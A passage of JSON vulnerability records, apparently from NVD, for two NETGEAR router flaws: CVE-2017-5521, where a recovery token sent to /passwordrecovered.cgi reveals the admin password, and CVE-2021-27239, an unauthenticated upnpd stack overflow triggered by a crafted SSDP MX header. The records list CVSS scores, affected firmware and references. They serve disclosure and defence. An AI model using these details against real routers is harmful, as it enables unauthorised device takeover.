"value": "Se ha descubierto un problema en dispositivos NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900 y R8000. Son propensos a revelar la contrase\u00f1a a trav\u00e9s de peticiones simples manipuladas al servidor de gesti\u00f3n de la web. El error es explotable remotamente si la opci\u00f3n de gesti\u00f3n remota est\u00e1 activada, y tambi\u00e9n puede ser explotado dado el acceso al router a trav\u00e9s de LAN o WLAN. Cuando se trata de acceder al panel web, se pide al usuario que se autentique; si la autenticaci\u00f3n se cancela y la recuperaci\u00f3n de contrase\u00f1a no est\u00e1 habilitada, el usuario es redirigido a una p\u00e1gina que revela un token de recuperaci\u00f3n de contrase\u00f1a. Si un usuario proporciona el token correcto a la p\u00e1gina /passwordrecovered.cgi?id=TOKEN (y la recuperaci\u00f3n de contrase\u00f1a no est\u00e1 habilitada), recibir\u00e1n la contrase\u00f1a de administrador para el router. Si la recuperaci\u00f3n de contrase\u00f1a est\u00e1 habilitada, la explotaci\u00f3n fallar\u00e1, ya que pedir\u00e1 al usuario preguntas para la recuperaci\u00f3n que fueron previamente establecidas cuando se habilit\u00f3 esa caracter\u00edstica. Esto es persistente (incluso tras la inhabilitaci\u00f3n de la opci\u00f3n de recuperaci\u00f3n, la explotaci\u00f3n fallar\u00e1) porque el router preguntar\u00e1 por las preguntas de seguridad."
}
],
"id": "CVE-2017-5521",
"lastModified": "2025-02-04T21:15:12.283",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
},
"published": "2017-01-17T09:59:00.333",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability"
},
{
"source": "cve@mitre.org",
"tags": [
"Broken Link",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/95457"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.exploit-db.com/exploits/41205/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/95457"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.exploit-db.com/exploits/41205/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2021-03-29 21:15
Modified
2024-11-21 05:57
Severity ?
Summary
This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR R6400 and R6700 firmware version 1.0.4.98 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the upnpd service, which listens on UDP port 1900 by default. A crafted MX header field in an SSDP message can trigger an overflow of a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-11851.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "ADF65DC4-51D5-4C38-B28D-7EA93B1734A3",
"versionEndExcluding": "1.0.0.68",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3EEA190-2E9C-4586-BF81-B115532FBA23",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "888A8E0F-93DD-436D-B00C-F469C3BD6E5B",
"versionEndExcluding": "1.0.0.102",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7D30939B-86E3-4C78-9B05-686B4994C8B9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "08668CFE-EE8B-4EE9-8B9D-FFCB45EE27D2",
"versionEndExcluding": "1.0.0.66",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7000:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "D8780623-F362-4FA5-8B33-37E9CB3FEE12",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "160F53B0-8430-4D85-8ABC-0A64B27DDFBD",
"versionEndExcluding": "1.0.3.60",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "814A0114-9A1D-4EA0-9AF4-6968514E4F01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dc112a_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9A59578F-1A3F-428B-A995-572C8E93C15C",
"versionEndExcluding": "1.0.0.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dc112a:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F87FFC46-137D-45B8-B437-F15565FB33D0",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5E273CF7-2DB6-4641-8753-810949D631B0",
"versionEndExcluding": "1.0.1.94",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9F45B620-60B8-40F3-A055-181ADD71EFFF",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex7500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3A9F4EEE-E2D2-42B2-BC5C-844055677C1C",
"versionEndExcluding": "1.0.0.72",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex7500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "44336289-F9DA-4779-8C1A-0221E29E2E2F",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "049629DD-9E4F-4F47-98B0-C9FD457B74A0",
"versionEndExcluding": "1.0.4.48",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "685E2CA4-AA89-4574-8DB1-7C06D9F0FF2D",
"versionEndExcluding": "1.0.4.50",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "930E739E-EFDC-49AB-9155-A71C2B25FCD6",
"versionEndExcluding": "1.0.1.68",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E02F15FF-76B1-43DD-85E0-A34E764E638D",
"versionEndExcluding": "1.0.4.102",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "52AE9AD2-BC8D-477D-A3D3-891AE52FA5F3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "357EDE1B-75BA-4515-B0E9-2B70EF993244",
"versionEndExcluding": "1.0.4.102",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "5A09A9E8-8C77-4EDB-9483-B3C540EF083A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "839A9EBE-5F14-4695-8040-7D5607F8E248",
"versionEndExcluding": "1.3.2.132",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D9F1DAD0-F8B8-48D5-B571-C55636B274C3",
"versionEndExcluding": "1.0.11.116",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EAF3EA40-79FB-4D2C-A8AF-A04820745C4D",
"versionEndExcluding": "1.3.2.132",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1AC36017-5BCF-4CF6-91D0-278279943847",
"versionEndExcluding": "1.0.0.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7850_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EF7A1DF8-E9A0-4312-AC37-DEB46E37EE50",
"versionEndExcluding": "1.0.5.68",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7850:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DAF94D73-B6D0-4334-9A41-83AA92B7C6DF",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "96390A31-03B8-477B-8710-F797CB44E741",
"versionEndExcluding": "1.0.4.38",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DAB3F350-9094-4B64-8ED9-517069EB56F4",
"versionEndExcluding": "1.4.1.68",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3D6A70D-66AF-4064-9F1B-4358D4B1F016",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7960p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0ECEE38A-B0BB-43F8-AB4D-26572B789BFB",
"versionEndExcluding": "1.4.1.68",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7960p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "091CEDB5-0069-4253-86D8-B9FE17CB9F24",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D10E41DC-982F-444A-9A4D-82EC2BA64199",
"versionEndExcluding": "1.0.4.68",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "61DF6302-36B7-49CF-8F2C-4C2247112EB9",
"versionEndExcluding": "1.4.1.68",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F7EF872D-2537-4FEB-8799-499FC9D44339",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "60634A15-B02A-4C33-A1A4-F6340CFD6B8B",
"versionEndExcluding": "1.0.2.144",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F8E565CF-8408-4502-97BD-01CEF15D0744",
"versionEndExcluding": "1.0.2.144",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rax200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "609B0EC8-FCD3-4522-A06A-7CB521586A22",
"versionEndExcluding": "1.0.2.88",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rax200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "58EB0F2F-FB5C-47D9-9AE6-087AE517B3F9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rax75_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "ADDF0077-E02C-4DDA-A84E-DF3A0237FC66",
"versionEndExcluding": "1.0.3.102",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rax75:-:*:*:*:*:*:*:*",
"matchCriteriaId": "1BAA74D7-36A1-4494-96A2-BD0D2D6BF22F",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rax80_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "81DF924F-FDA4-4588-B8A3-6F18ABBD4976",
"versionEndExcluding": "1.0.3.102",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rax80:-:*:*:*:*:*:*:*",
"matchCriteriaId": "06B5A85C-3588-4263-B9AD-4E56D3F6CB16",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rbr750_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B6AE1767-9D9A-4E9E-B088-6727FACFDE5C",
"versionEndExcluding": "3.2.17.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rbr750:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C13F5C69-FA9B-472A-9036-0C2967BDCDE9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rbr850_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "01E0EF50-145F-407A-8915-4EFFCD833505",
"versionEndExcluding": "3.2.17.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rbr850:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D92E4C8E-222A-476C-8273-F7171FC61F0B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rbs40v_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1CA086E1-DB23-4130-B746-D56F5A188C3B",
"versionEndExcluding": "2.6.2.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rbs40v:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F0D05F28-47A2-46AE-992E-132B34F6194B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rbs750_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F614A1AB-F0C0-45D7-8D91-ECA3C1AA9165",
"versionEndExcluding": "3.2.17.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rbs750:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B529194C-C440-4BC3-850F-0613FC548F86",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rbs850_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0DC5A075-0619-409C-B057-41015B8C54B3",
"versionEndExcluding": "3.2.17.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rbs850:-:*:*:*:*:*:*:*",
"matchCriteriaId": "221CA950-E984-44CD-9E1B-3AADE3CEBE52",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:rs400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8509E165-B497-4483-95E6-7BEB2AB40946",
"versionEndIncluding": "1.5.0.68",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rs400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "2700644E-0940-4D05-B3CA-904D91739E58",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "065AE552-7268-45C5-92CA-B56602C9313D",
"versionEndExcluding": "1.0.1.38",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3400:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "1992E44C-122C-41BC-8FDC-5F9EBEE1FB7C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr3500l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2FCE2862-B111-45A9-85D9-8BABEFE4F856",
"versionEndExcluding": "1.2.0.66",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr3500l:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "C8DE4BFA-41DE-4748-ACC7-14362333A059",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:xr300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4AF96D62-1D28-4FE5-AFC3-FB93A1BB4D45",
"versionEndExcluding": "1.0.3.56",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:xr300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5590CF28-B88A-4755-904B-1BC1778FBEDD",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR R6400 and R6700 firmware version 1.0.4.98 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the upnpd service, which listens on UDP port 1900 by default. A crafted MX header field in an SSDP message can trigger an overflow of a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-11851."
},
{
"lang": "es",
"value": "Esta vulnerabilidad permite a atacantes adyacentes a la red ejecutar c\u00f3digo arbitrario en las instalaciones afectadas de los enrutadores NETGEAR R6400 y R6700 versi\u00f3n de firmware 1.0.4.98.\u0026#xa0;No es requerida una autenticaci\u00f3n para explotar esta vulnerabilidad.\u0026#xa0;El fallo espec\u00edfico se presenta dentro del servicio upnpd, que escucha en el puerto UDP 1900 por defecto.\u0026#xa0;Un campo de encabezado MX dise\u00f1ado en un mensaje SSDP puede desencadenar un desbordamiento de un b\u00fafer en la regi\u00f3n stack de la memoria de longitud corregida.\u0026#xa0;Un atacante puede aprovechar esta vulnerabilidad para ejecutar c\u00f3digo en el contexto de root.\u0026#xa0;Era ZDI-CAN-11851"
}
],
"id": "CVE-2021-27239",
"lastModified": "2024-11-21T05:57:39.813",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 6.5,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "zdi-disclosures@trendmicro.com",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2021-03-29T21:15:12.377",
"references": [
{
"source": "zdi-disclosures@trendmicro.com",
"tags": [
"Vendor Advisory"
],
